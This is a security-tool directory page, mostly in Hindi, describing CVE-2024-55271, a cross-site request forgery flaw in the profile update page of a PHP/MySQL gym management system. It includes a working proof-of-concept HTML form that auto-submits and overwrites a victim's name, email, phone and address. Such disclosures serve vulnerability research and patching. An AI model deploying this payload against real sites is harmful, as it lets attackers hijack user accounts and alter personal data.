Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2024-55271 — GYM management system using PHP and MYSQL | Kitploit
उपकरण/GitHubGitHub/shoaibalam112/cve-2024-55271
Vulnerability AnalysisWeb Application ExploitationWeb SecurityPenetration TestingLearning & Education
GitHubshoaibalam112/cve-2024-55271

CVE-2024-55271

GYM management system using PHP and MYSQL

रिपॉजिटरी देखें
6 महीने पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

जिम प्रबंधन प्रणाली ( CVE-2024-55271 )

PHP और MySQL का उपयोग करके बनाया गया एक जिम प्रबंधन प्रणाली।

लेखा परीक्षक

Shoaib Alam - LinkedIn प्रोफ़ाइल

विवरण

प्रोफ़ाइल अपडेट अनुभाग में CSRF कमज़ोरी

जिम प्रबंधन प्रणाली में एक क्रॉस-साइट रिक्वेस्ट फोर्जरी (CSRF) कमज़ोरी की पहचान की गई है। यह समस्या उपयोगकर्ता पैनल की प्रोफ़ाइल अपडेट कार्यक्षमता में मौजूद है।

एप्लिकेशन में वर्तमान में एंटी-CSRF टोकन का कार्यान्वयन नहीं है, जिसके परिणामस्वरूप क्रॉस-साइट रिक्वेस्ट फोर्जरी (CSRF) हमलों की कमज़ोरी है। यह सुरक्षा कमज़ोरी विशेष रूप से /profile.php एंडपॉइंट को प्रभावित करती है। एक हमलावर इस दोष का शोषण करके संवेदनशील उपयोगकर्ता जानकारी, जैसे पता, नाम और फ़ोन नंबर में अनधिकृत संशोधन कर सकता है। यह संभावित रूप से उपयोगकर्ता खातों की अखंडता से समझौता कर सकता है और आगे सुरक्षा समस्याओं को जन्म दे सकता है।

कमज़ोर एंडपॉइंट: /profile.php

प्रूफ ऑफ कॉन्सेप्ट (PoC)

नीचे एक प्रूफ ऑफ कॉन्सेप्ट है जो CSRF कमज़ोरी को प्रदर्शित करता है। यह PoC Burp Suite Professional का उपयोग करके उत्पन्न किया गया था।

root@kitploit:~
<html>
  <!-- CSRF PoC - generated by Burp Suite Professional -->
  <body>
    <form action="http://localhost/gym/profile.php" method="POST">
      <input type="hidden" name="fname" value="hacked" />
      <input type="hidden" name="lname" value="victim" />
      <input type="hidden" name="email" value="attacker&#64;gmail&#46;com" />
      <input type="hidden" name="mobile" value="9999999999" />
      <input type="hidden" name="state" value="hacked" />
      <input type="hidden" name="city" value="hacked" />
      <input type="hidden" name="address" value="hacked" />
      <input type="hidden" name="submit" value="Update" />
      <input type="submit" value="Submit request" />
    </form>
    <script>
      history.pushState('', '', '/');
      document.forms[0].submit();
    </script>
  </body>
</html>
टूल डाउनलोड करें